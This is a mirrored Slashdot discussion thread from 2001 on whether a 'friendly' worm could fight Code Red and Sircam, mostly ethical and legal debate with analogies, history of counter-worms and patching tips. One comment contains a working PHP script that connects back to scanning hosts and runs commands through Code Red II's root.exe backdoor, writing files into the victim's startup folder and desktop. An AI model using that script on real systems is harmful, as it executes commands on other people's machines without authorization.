Slashdot Mirror
Fight Virus With Virus?
Insanik writes "I am not an expert with internet worms like Code Red. However, I am curious if it would be possible to create a friendly worm/virus/whatever that would fight the original by using the same security holes. For instance, I read that Code Red II opens a back door. Why not have another virus that exploited the back door, closed it, then started sending itself to other servers for a certain period of time? " The submittor raises an interesting question - is this possible? I would guess so, in theory. And while we're working on Code Red, can we send a large man to the home of my latest Sircam senders and politely "ask" them to stop clicking on virii?
I hope I didn't just /. those urls! :^)
One line blog. I hear that they're called Twitters now.
FYI, I have a normally reliable Cisco 675 router that Was repeatedly being infected with Code Red, requiring a reboot each time. Here's the easy fix:e d-worm-pub.shtml for more, and check your ISP's web site for the actual patch.
1) From the "cbos#" prompt*, input the command "set web disabled". I think you'll have to follow that up with the "write" command. That shuts off the router admin web-interface. If you really must have that interface, you can change the port instead.
2) Upgrade the CBOS to version 2.4.1. See http://www.cisco.com/warp/public/707/cisco-code-r
Hope that helps...
*Note: to get to the "cbos#" prompt, input the command "enabled" at the "cbos>" prompt.
Wrong. You dont write a second worm. You simply a write a daemon that runs on an IIS box. This daemon (part of which I have already written - just cant get it to work right) - would intercept code red attacks - and then attempt to deinfect the attackers box using the security holes code red left behind. It wouldnt actually "spread" itself. It would just clean the infected boxes remotely. If enough smart people install it - code red is history.
My damn code works perfectly in my test environment - but only works halfway on the net......
Gam
"Flame at Will"
I love idealists not because I am one, but because they make life bearable for pragmatists such as myself.
This is like saying that a certain amount of rape is inevitable, so lay back and enjoy it.
.. more violently .. pick your poison, but eye-for-eye almost always leads to revenge worse than the original crime, even if it is in the name of authority.
.. sure, some of the viruses will help fight malicious ones, but after awhile, it will be difficult to tell just who the white and black hats are. Nevermind that the popularization of viruses for the cause of 'good' will start masquerading about for various personal causes; ie, the 'good' virus that only attacks 'hell-bound' porn sites, or 'good' viruses that only attack sites which endorse gay rights. (Well, of course, these types of attacks and viruses already exist, but legitemizing the distribution of viruses would only allow these authors to claim they are writing 'good' viruses.)
.. for good."), nor figure in the cost of 'good' viruses written improperly, and subsequently causing as much damage as the 'bad' viruses they seek to purge.
/. tradition. I'm just saying, there are other ways to fight viruses .. such as forcing a certain software maker to fix the pieces of swiss cheese they call web servers and mail clients, or condemning friends and family for not practicing caution when being online.
No, it's like saying a certain amount of rape does not justify raping the rapists (otherwise we could just allow rapists-to-be to get their jones off raping rapists (of their gender preference of course)). I realize that sometimes we are stuck between a rock and a hard place when dealing with miscreants, but the power to commit acts deemed illegal at the behest of authority leads to corruption - family and friends of those in charge of supervising the counter-rapes would no doubt get first shot, rape harder than the rapist did, longer
I support community action more than the average individual, but there is a very important distinction here: community action is only warrented when the action is to stem abuse and corruption AND the adversary does not make themselves avaiable to a dialog; and even THEN, only if they refuse to aknowledge that a large enough opposition to their behaviour or ideals should result in change.
I do NOT support community action to fight violence. Why? People are not responsible enough to recognize the difference between revenge and problem resolution. When it comes to the moment when you're smashing the bat over some dissident's head, you're probably not thinking about whether or not said dissident will continue their actions (in this case, continue writing bad viruses), but rather how much the dissident had this coming to them. And since you've lost sight of the goal, no resolution is likely to come from it. Same goes with white hat viruses
All this is notwithstanding the fact that you'd raise awareness of how to write viruses (I'd imagine you could easily publish a book "How to get into an IIS server, and spread
Unfortunately, mentalities like yours seem to prevail. People lack the tolerance and foresight to see that sometimes the eye-for-eye cure, no matter how self-satisfying, can cause the problem to reach levels of magnitude far beyond that which it would have reached had resolutions be seeked IN OTHER WAYS.
Incidentally, there is someone on our street with cracked windows. Despite this, everyone else seems content to continue to take pride in the appearance of their dwelling; the lawns are mowed, and the flower beds are gorgeous. If the motivation for behaviour was whatever the lowest common demonitor was, we'd have never gotten out of the stone age. I should hope that the sole motivator for maintaining some sense of responsibility, dignity, and self-control is not that others HAVE to do it to. I could list hundreds of examples, from j-walking to litter in which the only reason they havn't reached catasphoric levels is because SOME people take it upon themselves not to contribute to the problem, even if there is little chance of being punished or caught. Even if littering and jwalking were legal, I'm positive a significant portion of the population would continue respecting others' environment and traffic flow.
A please notice I never once suggested we 'lay back and enjoy it', although I suppose drawing judgemental conclusions out of posts has long since become a
"Old man yells at systemd"
... and fun for the entire family no less.
... it's better in the long run.
.ph0x
Think of the added bandwidth usage that would cause - consievably doubling or trippling the amount of wasted line volume. Just download more pr0n
---
ps -aux | grep mind
I'm not sure which you're talking about. Blackholing port 80 isn't a bad idea short-term, but running with the assumption that sooner or later, it'll be opened back up, while insane amounts of traffic may not come with it, there's still a small matter of rooted boxes out there that people haven't fixed, which present a big problem: their ISPs should block traffic to their webserver based on the rooting and send them an e-mail indicating as such.
Why's a "good worm" a bad idea? Something about it being untested, something about it whoring up bandwidth on its own, something about it being as much of an unknown quantity as the worm it purports to fix, you know. Like that.
Easy does it!
This comment has been submitted already, 276865 hours , 59 minutes ago. No need to try again.
This has some merit, as far as what it would intend to do - go out and fix stuff, making the world a more secure place. (here it comes...) But.... it opens up way too many cans of worms (no pun intended) as far as privacy issues and such. For example, I don't want some unknown worm of some sort poking at my web server. I want *me* poking at it, knowing what's going on with it, etc. If I go to run a patch, and suddenly it says "this patch has already been run" I wanna know why, and how, and who. Also, it comes down to the fact that sysadmins can't be lazy. I've seen so many, many "tech ppl" who think they have a clue, think that all they need to do is install a few things, and they're gods. They forget the second half.. the *work* part of their job.. where they have to go out, get patches, keep up to date, be PRO-active to problems and potential problems. My thought on that is, maybe if a few systems get infected, it might wake up some of these techs and get them to motivate their collective butts to get themselves patched. If they don't, it's nobody's fault but theirs.. the patches have been out for months.
{} ------ When I think of a good sig, I'll put it here
Why is it that the proponents of "one nation under God" are so eager to get rid of "liberty and justice for all"?
My approach would be educate in a real-world situation. If someone has too much time on his hands and wants to do this, well here's a suggestion:
:)
Lock the screen in black, disable ctrl-alt-delete on any OS, and type this a bit below average reading speed in white:
"Boo... I'm a virus, you know what you did was really dumb?... You're lucky this time, you will lose no data, I won't send anything critical by email without your knowledge, and your operating system will stay intact... in exchange you'll have to bare with this message for a few minutes.
Clicking on attachments in your email when you don't even know where it comes from = Stupid.
Clicking on attachements of which you don't even know the extension = Dumb.
Opening a file that you don't know about in your [download] directory = Asking for trouble
Did you know that running an operating system without updated antivirus file, or without antivirus at all is bad when you're a rookie? (you ARE a rookie since you are reading this, please don't consider yourself bright or IT-man 2001 because if you ARE actually working in IT, you're even dumber than a rock, reason #1? a rock wouldn't catch this virus)
If you typed CTRL-AlT-DELETE anytime while this was displayed, you diserve to be wiped and bitchslapped you selfish log, if you don't care about the damages you can get, think about the damages you can create by spreading your stupidity?
Now find a way to remove me, else I'm gonna repeat this every xx minutes, and in the end, I might actually end up doing something bad.
Regards, retard!"
howzat?
--- Metamoderating abusive downgraders since my 300th post.
Emphasis mine, of course. Patrick Henry summed it up, but the Constitution spells it out.
Thanks for taking my bait.
Gamingmuseum.com: Give your 3D accelerator a rest.
Sadly I haven't gotten many of
these virii mails, however when I do,
I always |strings (just like with any word doc). It's interesting what you end up finding.
According to a friend of mine, a SirCam infected PC in his HR dept sent out an excel spreadsheet with employee salary's. Yippeee!
this space intentionally left blank
Haven't we seen this already with the Cheese worm? It attempted to fix broken Linux systems and repair damage done by other worms.
IIRC, people didn't appreciate it, and noted so in the Slashdot article about the worm (found here).
Why would this be any different?(not that I'd seriously mind having some of my work done for me, but hey... I don't want people playing around on my machines, regardless of why they're doing it)
meisenstGreen's Law of Debate: Anything is possible if you don't know what you're talking about.
you have about 600 anti-virus viruses on your server you don't know about some of which were poorly written leaving the admin to weed out the cpu hogging, mem leaking, anti-virus viruses.
Photos.
I have often thought about the countersuit idea. It would not be criminal court though. You would be in criminal court. It would only work if there were some law about negligence or criminal facilitation, but you would have to prove that they knew their server was hacked and failed to take actions to fix it.
Ummm, Jon, aren't you supposed to be dead...? - Otter(3800)
Is it possible you accidentally left your sense of humour and response to irony in your other pants?
------ The only greater hazard to your liberty than n politicians is n+1 politicians.
If you are in a dark alley somewhere, and there is one other person, and he draws a gun on you, indicates an intent to harm you, you have the right to use your weapon ONLY IF that is your last resort. And I won't even go into the notion of the "danger to life and limb" that is present in that scenario, but suffice it to say that generally speaking, you can do things you can't otherwise get away with if it's for the purpose of saving a life.
When it comes to your web server, nobody's going to die if you get defaced, rooted, bent over, etc. It costs some money to fix, ok, but that does not give you carte blanche to break the law at a similar level. Keep in mind that nearly every law that outlaws hacking is based on "unauthorized access." It doesn't matter WHY you're doing it, just that you know you're not supposed to be there. And if you're basing your code upon a notorious worm...well...good luck trying to say "I didn't know!" :)
Final point, you have other options. Keep up with your patches. Install IDS and watch the logs. Yes, this takes work, but so does writing a counter-worm every time a new worm comes out, and at least this way you can be protected BEFORE it hits, not after. And if all those Code Red-nailed boxen are knocking any of your systems offline, I gotta tell ya, you need to do something about your network, because as severe as the scanning is, I haven't heard from a single client who has actually had downtime from it.
For your security, this post has been encrypted with ROT-13, twice.
One example of something similar is the "noped" virus, which scans for child pornography and then emails any suspect files to law enforcement authorities. A good description on the possible legal implications is located here http://www.infosecuritymag.com/digest/2001/05-31-0 1.shtml
It amazes me that someone of their nature (a major name) hasn't got anyone competant on site to install this FIX.
Then again, judging by the fact that their standard FIX to performance problems on a Solaris machine was to reboot it, I'm suprised that anything works at all.
I am not a lawyer, so please take what I say with a grain of salt (Maybe more).
If your local machine were to have the equivalent of a self defense mechanism, that responded only to direct attacks by other machines, that's one thing. With such a system your machine is limited to warning the attacking system before using minimal resources to defend itself.
On the other hand, if your machine is actively seeking to modify an attacking system, by patching it, destroying it or otherwise, one would say you've gone beyond self defense and are an active participant in malicious intentions.
Causing another machine to patch be patched and then to still attack another system simply to patch it up, seems like a grand idea, but the root problem remains, and you've simply added to it. Legally, I believe, this would be called an ilegal act (remember grain of salt).
I am Lord Snowbeam. Heed my call!
Microsoft... because if you downloaded their 'official' IIS patch from their website, they MAKE you aggree to run this code on one and only one licenced PC... And they WOULD probably sue you on principle. Then patent your proactive updating technology for Windows XP.
Yes, but the server you are responding against is not the attacker... it is a victim of the worm. That's like shooting the hostage and the attacker to defend yourself... That doesn't seem right to me. That is a bit different though considering you are not causing damage to the "hostage" machine, but you would be trespassing since you did not get permission from the owner to fix the problem.
Come to think of it, I like the name "Code Raid" better -- Kills those bugs and worms dead!
One line blog. I hear that they're called Twitters now.
In this case, you would be shooting at every gun owning or potential gun owning person you come across. This is generaly frowned upon
So close and yet so far from the world's perfect ID number
What about just disabling the viris as a response to the scan? As Code Red boxes advertise themselves as infected and vulnerable, you don't need to probe the net for infected/vulnerable computers. Besides, releasing _any_ scan-and-infect worm on the net is a bad idea.
Is automatically patching someones box for them (as compared to infecting it) a valid form of self defence? I can't see being sued for it.
If you wanted to go a little further overboard, you could install a defensive-response worm in response to an attack. It would only spread as far as the origional infection and place minimal load on the net.
-- http://thegirlorthecar.com funny dating game for guys
I made a virus that installs Apache on the system? That would do the trick.
Gamingmuseum.com: Give your 3D accelerator a rest.
now THERE is something to get cracking at, for all of those who didn't know, there are certain fellows who take goatse.cx as a religon, boy would they be happy to see it spread!!!, not only is goatse a nasty image, it has also grown to be a symbol of internet counterculture.
I think you have a right to point a gun at them. Whether you have the right to pull the trigger depends on their reaction (if they have a lethal weapon of their own, then maybe you shouldn't wait for a reaction). If your gun causes them to run away and you still shoot them, I say that makes you a murderer.
All I want is a secure system where it's easy to do anything I want. Is that too much to ask ~~ Randall Munroe
You can't sue someone because somebody misuses their product. If I kill your puppy by putting drain cleaner in his food dish, you can't sue the drain cleaner manufacturer.
I think Microsoft would be safe. This is clearly not the intended use of their product.
Here's a safe alternative: make this php script 'default.ida' and configure apache appropriately. It places a warning in c:\, c:\my documents, c:\winnt\start menu\programs\startup and c:\winnt\desktop (trying to have everyone covered). It then logs the requests so you can email the administrators. (You will need to remove the extra spaces added by slash) /scripts/root.exe?/c+echo+Danger:+you+are+infected +with+code+red+2.+Please+go+to+http://www.microsof t.com/Downloads/Release.asp?ReleaseID=30800+>+c:\\ a viruswarning.txt HTTP/1.0\r\n\r\n"); /scripts/root.exe?/c+echo+For+windows+NT4+use+http ://www.microsoft.com/Downloads/Release.asp?Release ID=30833+or+to+prevent+future+worms+either+turn+of f+ISS+or+go+to>>+c:\\aviruswarning.txt HTTP/1.0\r\n\r\n"); /scripts/root.exe?/c+echo+http://www.apache.org+fo r+a+real+server.+You+can+contact+me+at+MYEMAILADDR ESS+This+is+an+automatic+warning+system+that+sends >> +c:\\aviruswarning.txt HTTP/1.0\r\n\r\n"); /scripts/root.exe?/c+echo+you+this+warning+when+yo ur+server+attacks+mine+(of+course,+I+use+a+server+ that+isnt+vulnerable+to+so+many+attacks),+so+this+ message+was>>+c:\\aviruswarning.txt HTTP/1.0\r\n\r\n"); /scripts/root.exe?/c+echo+triggered+when+my+server +was+attacked.>>+c:\\aviruswarning.txt HTTP/1.0\r\n\r\n"); /scripts/root.exe?/c+copy+c:\\aviruswarning.txt+c: \\docume~1\\Administrator\\mydocu~1 HTTP/1.0\r\n\r\n"); /scripts/root.exe?/c+copy+c:\\aviruswarning.txt+c: \\docume~1\\Administrator\\desktop HTTP/1.0\r\n\r\n"); /scripts/root.exe?/c+copy+c:\\aviruswarning.txt+c: \\docume~1\\Administrator\\startm~1\\programs\\sta rtup HTTP/1.0\r\n\r\n");) ;
fwrite($log,$REMOTE_ADDR . " " . date("r") . " " .$res );
<?php
header("HTTP/1.0 400 You appear to be infected"); ?>
<html>
<title>Red Alert
<?php
$fp =fsockopen($REMOTE_ADDR,80,$en,$es,5);
if (!$fp)
{
echo "I tried to warn you, but couldn't connect: $es ($en)";
}
else
{
fputs ($fp, "GET
fputs ($fp, "GET
fputs ($fp, "GET
fputs ($fp, "GET
fputs ($fp, "GET
fputs ($fp, "GET
fputs ($fp, "GET
fputs ($fp, "GET
echo "I tried to warn you, and the server started to say:<h2>";
echo $res =fgets($fp,1024);
fclose($fp);
}
$log=fopen("/var/htdocs/logging/redalert.log","a"
fclose($log);
echo "</h2> $SERVER_SIGNATURE";
?>
They that quote Benjamin Franklin on liberty and safety deserve neither.
The problem -- as many knowledgeable folks have already reported -- is that admins are reluctant to update production servers, because of the fact that such updates can and do break those systems.
Do you really want to rely on Microsoft's updates to be reliable and correct? Updates are best installed on test servers and then migrated to production systems. The fact is that once an exploit is discovered, it typically takes several months for destructive software to be released that takes advantage of the export. Code Red came out much quicker and that has caused many of the problems we are witnessing.
www.timcoleman.com is a total waste of your time. Never go there.
It is unlikely that you will ever be able to collect damages from Microsoft due to its negligently written, destructive products. But why not send Billy-boy a bill for the repairs anyway?
How could it be a problem? It could have a bug.
Remember, this thing would be entirely out of your hands once it started propagating. Keeping in mind that programmers are human, consider what would happen if something went wrong along the way. I mean, even RTM found that his worm didn't do what he expected.
Also, imagine what would happen if someone used your worm with a malevolent payload. We're talking seriously bad publicity.
Hell, yes! I'd take Alexander the Great over Napolean any day. I'd take Napolean over Hitler any day.
Run a pencil-and-paper RPG campaign with your far-off friends: Gametable!
hubbabubba
And don't call me no sigless wonder dangit!
Fried ice cream is a reality. - George Clinton
Is it possible you accidentally left your sense of humour and response to irony in your other pants?
He probably hates me because he's not circumcised. [grin] With my .sig, I get irrational stuff like that every now and then.
Fire and Meat. Yummy.
This is such a typical response from a slashdotter. Fine, so these people are using Microsoft, but like it or not there are a bunch of servers that you probably hit all the time that run on IIS. What really pisses me off about this site sometimes is how quick people are to say "screw you" to anything that has to do with Microsoft. I dislike them as much as the next person, but just like all other debates, to each their own. How about we all get to together and help each other instead of constantly ranting about how much 'their' stuff sucks. And if possible, I think the idea of the 'good' worm would be great. Only I doubt the IT people out there would want some random worm playing around with their stuff.
How about instead just writing a program that sends e-mail to the offending system every time it makes an attempt to infect your system. That way, you're only notifying them of the problem (each and every time it occurs), and they'll be obliged to do something about it before their e-mail logs fill up.
GreyPoopon
--
Why is it I can write insightful comments but can't come up with a clever signature?
Nuf sed!
who says anyone doing this would have to announce that they did it? why not just go ahead and post it in some warez and let some script kiddie propogate it... and post the source for people to see how insanely easy it was to do it
Ah, yes. The good old "they're here to take our women!". And just how many burglars do that?
I have the right to self defense
Yes. After he/she attacks you. Attack on your property is not enough. Or do you think your wife is your property?
Thanks!
In other words, what you do may be ethical, that doesn't make it legal. Using the same methodes as a virus to gain access to someone's computer is not legal. It doesnt matter if you are trying to defend againts a virus, it's still illegal.
:)
Criminal law guarantees you a trial by your peers. It is not illegal if your peers will not convict you. Here is an example: I knew a fellow in San Francisco who got AIDS as a long-time drug user. He nearly withered away and died. He started smoking pot at the advice of his physician even though it was illegal at the time. He was arrested numerous times, but never convicted of smoking pot.
You see, a jury of San Franciscans will NEVER convict someone with AIDS of smoking pot to boost their appetite. My friend gained a lot of weight and probably lived another 2 years as a result of pot smoking.
In the case of CodeRed anti-virii, you would need to have a reasonable argument that your actions were justified as bettering society on the whole. If you don't think such an argument exists, I wouldn't recommend writing it
Your analogies aren't valid, because you're talking about cases where there is the threat of physical harm to an actual person. The Code Red virus is annoying, and it's causing major problems, but it's not going to kill anyone, and it's not going to permanently damage your system.
I disagree. CodeRedII is going to permanently damage your system. It is the equivalent of AIDS for computers - if completely knocks out your defenses, but doesn't cause any harm itself.
People with AIDS do not live very long. Neither will computers with CodeRedII. They are remote-rooted by anyone accessing the httpd port.
Also, you neglect to make an analogy between financial harm and physical harm, perhaps on purpose. Both are justifiable legally.
If you attack someone else's machine, then you're on exactly the same ethical level as the person who wrote the original virus.
THAT is a flawed analogy. Whereas it may not be appropriate to kill someone for committing murder, using an anti-virus to shut off machines with CodeRedII is completely different. The machines are compromised and vulnerable.
Imagine you are a business owner, and someone came along, opened the doors to your store, didn't take anything, and left. Are you trying to claim it would be illegal for me to close the door, and place me on the same level as the first person who opened the doors ?????
If you do believe that, please put down the crack pipe and back away slowly.
Some antivirus company just patented that, so you'd be sued as soon as you put it up.
The self defence point is a good one. I wonder if it would change the legality of it depending on how its executed. If you were to set up a script that would clean any machine that asked for default.ida off yours, then is it still illegal? You're not going out and actively searching for and patching servers, you're just hosting a file on your webserver, and if someone else requests that file from you, then its their problem what happens as a result. This passive approach just might be legal. This is all gross assumption however, since IANAL.
--
"Karma can only be portioned out by the cosmos." - Homer Simpson [1F10]
I would like to point out that many if not most of the machines that are still being infected by the Code Red worms are operated by users who are not even aware that they are running IIS.
Case in point, my roommate bought a Dell Dimension L700cx with Windows 2000 about 6 months ago. He was surprized when I showed him that his machine is running IIS and serving the default web page on port 80. This person did nothing to install or activate IIS, the machine was shipped with that configuration.
I think this fact is important to keep in mind when trying to understand why so many machines remain vulnerable to the IIS attack.
PS: We run our LAN behind a firewall that denies port 80, so my friend's machine was not infected.
We need Marcus.
Just a thought, but wouldn't it be perfectly legal to use the security hole to do a "net send Your machine is infected with CodeRed!!! Fix it!"? I mean, you are not touching their property, just sending a message. Since they inadvertently sent contacted you first, I believe that you are within your rights to contact them back. Anyone?
Javascript + Nintendo DSi = DSiCade
If you were a burglar in the UK you were (and are) very, very unlikely to get shot even before the "draconian" gun laws came in. There simply weren't enough guns around to make it a worry. So even if burglaries HAVE gone up since then, it's completely and totally unrelated.
Depends on whether or not you believe in statistics. Someone wrote an entire book on the inverse relationship between private gun ownership and certain categories of crimes; seems to apply whether or not any burglers get shot. Go figure.
It already happened about 15 years ago or so... it was called "Vacsina" and actually cured 1701/Cascade, 1704/format and Jerusalem, if I recall correctly. It was even auto-updating: different vacsina versions would recognize each other and the most recent would overwrite the older. Sadly, a few "nasty" strains came out too....
Vacuum cleaners suck. Kings rule.
I remember that happening on the Mac. I think it was a holiday timebomb. It was classified as a virus, or rather a trojan horse in this case.
photosMy Photostream
All someone needs to do is write something that disinfects hosts that scan it. Then it installs itself on the scanning host and closes the holes and waits for more hosts to scan it. Maybe even have it uninstall itself after a week or two.. or just leave it until the administrator uninstalls it. You could leave a big icon on their desktop or something :P Let the infected machines find you. Don't go searching for infected machines.
Why do schools neglect an ethics curriculum? They used to. But the US Supreme Court ruled that freedom of religion means freedom from religion.[br] [br] Besides, who's ethics are you going to choose. Mine (Militant Legalistic Christian) or yours (liberal anyting goes Pinko/Commie)?
Agent K: A *person* is smart. People are dumb, stupid, panicky animals, and you know it.
I just was thinking about the Code Red II and was wondering why a virus would be needed to cure them of the predicament they are in. It seems that because the virus itself opens up a backdoor which can be used to execute any command on the system, it would be possible to broadcast shutdown commands to the networks which the servers lie on. Since the virus itself is harbored in ram, it would be wiped with this. Sure it wouldn't patch the hole, but it would eliminate the threat. Also, IANAL, but I would imagine your liability for this would be much less, as you have altered no authorized data on the server, but (in the spirit of all the great analogies on slashdot today) have just asked for the server to purge itself and it has kindly obliged.
**AA: a bunch of mindless jerks who'll be the first against the wall when the revolution comes
Neither NT nor 2K install IIS by default ... but I'm with you on the way it's set up when you actually do install it - on 2K the default install of IIS includes not only a web server, but FTP and SMTP. Needless to say, not a nice thing to have popping up all over your intranet when developers need to test their web-based apps :-)
If this tool then installed the same service on each system that attacked it, code red would be wiped out very quickly. Just make sure you don't screw up.
Does this mean that if someone with the plague is following me around and coughing on me that all I'm allowed to do is to run away or lock myself in my house?
Or if I'm the resident of a small town and the owner of the local nuke power plant deicdes to block out the sun to raise my power bill does this mean that I'm not allowed to tip over his sun blocking device?
In this recent post this same topic was discussed already... or am I missing something? AFAIK, people who owned the systems didn't want it since it violated their systems, and others did want it since it would fix potentially vulnerable systems outside their control.
You're full of shit.
The scripts to do it are more or less out there, with a bit of tweaking. I could do it, and I have the "lack of ethics" to stop what is essentially a DDoS against my network. Why haven't I? I haven't found a place I'd feel secure in launching from without thread of legal retaliation; i.e. I think I'd get traced and the feds would kick my ass.
The Cheese Worm seems to constitute exactly what you want. Cheese actually sought out Linux hosts infected by the Lion worm and removes any backdoor root shells from /etc/inetd.conf . Some say the Cheese Worm constitutes the first hack-of-a-hack known.
Another first for Linux and Open Source software!
This suggestion is illegal and unethical. But, more importantly, it leads to a false sense of security. If a worm such as code red infects a box, the box is compromised. Remote users can reconfigure various portions of the box or use the root.exe exploit to basically do whatever they want. Patching the box to prevent further infection would be nice but it would be impossible to undo all the possible damage caused by remote root access to the system. The only way to truly clean a box infected with code red is to power off and reinstall the OS.
Dear old Mr. Franklin must be turning over in his grave! I assume you realize you are misquoting the person who authored the following phrase:
How in the world do you "give up" someone else's liberty? To Franklin, liberty is a right afforded to each person by his Creator, and in the quote you included he was bemoaning those who would sacrifice their own liberty.
I'm not saying that you don't present a rather strong ethical argument, but don't twist Ben Franklin's words. He was a revolutionary, not a pacifist.
You can't study the darkness by flooding it with light. --Edward Abbey
Your solutions should not affect the state of the infected machines..
..make a script to firewall off every infected computer for a day
[snip]
And if you happen to be an ISP taking this approach? Ooops, you just suggested a solution that affects the state of the infected machines.
Personally, I'm all for affecting these machines. They aren't in their right minds anymore, so to speak. They're causing damage and need to be stopped. In a month, they won't be, but today they are costing us all thousands in bandwidth.
Old Billy Gates would just have a heyday with that one, wouldn't he?
He already claims that Linux is a virus.
"Guns have a lot of benign uses. Ever shot clay pigeons? Ever shoot cans off a fencepost? It's fun!" No offense intended... but historically this activity was practice for killing, and from what I hear heroin is fun, too. The use of guns, heroin or MS products may have unanticipated consequences. The latter being the biggest offender economically. That is unless you wanted to elevate a sub-par silver spooned Harvard student to the status of "World Leader..." (The names have been implied to protect the innocent.)
Although I think it is totally ethical to fix security holes in people software without there knowledge... ok not totally ethical, but of all the unethical things someone does in a day it's probably the least unethical.
As I was saying. Although I don't think it is too unethical to send out some kind of program to close security holes I don't see why we would do it. Viri that attack correctable security problems primarily go after Windows computers because they represent a large homogenous population. That is they have a similar problem that the human species has, a shallow gene pool. Humans do not have much genetic variation from person to person. We all have the same strengths and weaknesses which means if we are attacked by something either almost all of us will survive (except those that die by chance) or almost all of us will die (except those of us that survive by chance). Windows boxes are the same, their only variation is represented by their version and a couple of service packs. Windows boxes all have the same bugs and security holes for a virus to go after.
Anyhow at this point you are wondering why I made that stupid analogy between human genetic variation and code base variation between windows machines. Well as long as these computers exist the only real defense they have is intelligent sys admins. If smart slash dot readers fix their security problems for them every time some minor upset like this code red virus happens they will never learn to protect their machines, and if that happens we will all be in a real jam when a virus that does have a chance of bringing the flow of information on the net to a grinding halt comes around. Remember it does matter if we are all running a secure box if there are a couple million windows users DDOSing us.
After visiting the antivirus pages on kiro5hin, I immediately wrote up a PHP /default.ida file to NOT probe or exploit their box, but to send this HTTP request: /your_box_is_infected_with_code_red/please_get_pat ches_from_microsoft HTTP/1.0
GET
Should they check their logs (and I'm hoping IIS reports failed requests since I don't know how it works), they'll see this message and maybe, just maybe, they'll do something about it.
This is an entirely passive, noninvasive approach that uses the existing (and intended) ports on their machine to report the problem. Let's just hope they have ears.
Imagine someone tied a rope around your neighbor's cat, so hard that he becomes agressive. His cat sees your cat and tries to attack him. You take his cat and remove the rope, and everything is fine.
The counter-worm won't damage the infected server. It will put it back to its normal state.
This space left intentionally blank.
The cure worm would not infect systems, it would only clean allready infected systems. The cleaning would take place when an infected system scans a "bait" pc. You say this is a bandwidth problem, but a few hundred k patch as opposed to the hundreds of megabytes of bandwidth the worm eats when scanning seems reasonable.
Remember that you are unique, just like everybody else.
This is an excellent suggestion© You're not changing any files but an alert will pop-up warning them of the virus©
Mod this parent up©
In reality, the people who are infected are probably also dumb enough to have port 139 open to where you could send the `net send©©©' directly to their IP and technically never touch their machine©
News for nerds...and pigs apparently. If you feel so justified in your actions there should be no need for cover up.
It is obvious people like you act not out of a feeling of right and wrong, but whatever twisted rationalizations you want. I find you repugnant.
On another note, I am tired of slashdot's policy of labelling those people who do not care to crate a slashdot account as "Anonymous Cowards": it is hardly heroic to post under a psuedonym, account or not. Few of the "brave" use their given names when posting garbage such as the post I am responding to.
Yes but you don't get to decide who is a "danger to yourself or others". A judge has to do that.
War is necrophilia.
Ah, but we (as a society) do legally require people to get vaccinated, because doing so benefits society as a whole sufficiently to justify the slight loss of personal freedom
Not so slight in the case of MMR vaccine which has caused much of the increase in autism cases lately.
Getting back to computers, what about where the anti-virus-virus causes inadvertant damage to the system because it has an unusual configuration, different software, etc. So instead of fixing the webserver, it utterly kills it. That could happen very easily if you binary patch even a slightly different version of the executable than you were expecting. Then what?
Just because it CAN be done, doesn't mean it should!
The first such anti-virus virus, Den_Zuko, was discovered in 1988. Check out this article on VNUnet, which has more info on the history of such software and why it's a bad idea.
More recently, the Linux.Cheese.Worm has done similar things for Linux users infected by the Linux.Lion.Worm.
++ Say to Elrond "Hello.".
Elrond says "No.". Elrond gives you some lunch.
Seems like a smart idea to me.
I thought that too, but if you think about it, all the virus would have to do is analyse log files or wait for incoming CR attacks, then patch the *known* infected machines, and look at it this way, you've got a testbed of machines with 60 boxes in it, lets say each one sends out 10 CR attacks a second (only within the range of the 60 machines), that's 600 http requests a second, now if you introduce a counter-worm to one of those machines, you've not only reduced that number to 590, but within the next 6 seconds (or so), you've reduced it to 0 - explain to me how this increases the strain on bandwidth again please? :)
All you have to do then is tell the worm to wait like 4 hours, then pop up a message saying "patch me bitch!" then wait another 4 hours, check to see if it's patched and then self destruct if it is...
Jado
http://www.jado.org
It might be possible to make a program that, given a sircam-infected file, would send something to the originator of the message. It could send a message with an attachment that looked for sircam, and, if it found it, removed it and installed the program. That way, it would take a sircam-infected machine and make it respond to future attacks by spreading to the originating machine but do nothing to anyone else.
The message could even say that was what it was doing.
"My advise is to run this script to remove the virus and to pass the information on to other people"
This wouldn't really be a virus at all: the people receive it in response to a request for advice and it is something you actually think they should be running. It doesn't try to infect other machines, except by advising their users to use it; no more illegal than Norton responding to a download request with a program.
Because the update notifier isn't automatically installed. The thing that irritates me most about microsoft is that they make easily exploitable, inadequately tested features like the internet printing capability default, but they don't for something like an automatic patch notification system.
All I wanted was a rock to wind a piece of string around, and I ended up with the biggest ball of twine in Minnesota
American Heritage Dictionary, dictionary.com. [clipped without a copyright attribution, oh no!]
[
Wonderful. He discusses right and wrong, and you attempt to refute with the law. The two are strikingly different.
While this approach would be inappropriate today, it was once the only effective means of terminating a runaway computer virus. In fact, in 1985, a malicious Macintosh virus was intercepted and disabled in this way by its benign twin. The original, potentially destructive, virus had escaped the lab and could only be apprehended via a viral mechanism, since there were no systems in place at the time to combat computer viruses.
Imagine a diabetic, an epeleptic or any other person with an illness that may leave them in a confused state.
Now imagine that they, in their confused state, wonder onto your property. Maybe you left the front door unlocked and the person thought it was their house. You ordering them about whilst brandishing a weapon confuses them more and they don't follow you word for word.
Can you legally shoot them? If you can then I hope to Hell I don't live in the same country as you.
Why do schools neglect an ethics curriculum?
Your solutions should not affect the state of the infected machines. Even if you could "fix" their machine. Even telling them that their machine is infected is over the line, if you're using their machine to do it.
If you're being hampered by Code Red hits, make a script to firewall off every infected computer for a day. Allow those firewalls to expire, and if they're still infected, they'll get blocked again.
- "Those who would give up essential liberty, to purchase a little temporary safety, deserve neither liberty nor safety." -- Benjamin Franklin
Yeah, that means you. You're giving up liberty-- not yours, but theirs. If you're messing with someone else's machine, you are part of the problem. No matter your intentions, or how nicely you word the "message" you deliver onto their desktop. Just don't touch it.If you're going to call it a virus, think of the influenza virus. A medicine is widely available on the market. It is up to the infected party to take the medicine, and it would be unethical to sieze the unwitting victim and force the medicine into their bodies.
It's just a small problem, and in a month, people will just roll their eyes about the terrible outbreak. The best thing to do in a storm is to shelter yourself until it passes, not to rage against the howling winds around you.
[
Another analogy: the lock on the front door of your house is broken. I'm walking down the street, trying all the doornobs and I get into your house. Having the best motives, I fix your front door lock. I leave a note behind telling you just what I did. You come home, read the note and start looking around your house to make sure your valuables haven't been stolen, your diary read, etc. You feel your privacy has been invaded.
Find infected machines and popup a warning Window on each machine telling them they're infected.
I don't agree with doing it whatsoever, but that would wake up a lot of sysadmins.
The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
slashdot.org
bbc news
